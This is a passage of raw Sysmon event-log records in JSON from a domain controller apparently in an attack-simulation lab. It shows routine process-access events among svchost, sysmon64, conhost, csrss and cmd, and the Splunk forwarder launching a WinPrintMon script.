\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-0010F6000400}\r\nTargetProcessId: 3968\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-0010F6000400}","TargetProcessId":"3968","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.242\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-001066040400}\r\nProcessId: 4040\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.242","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-001066040400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-001066040400}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-001066040400}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-001066040400}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-001066040400}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.239\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 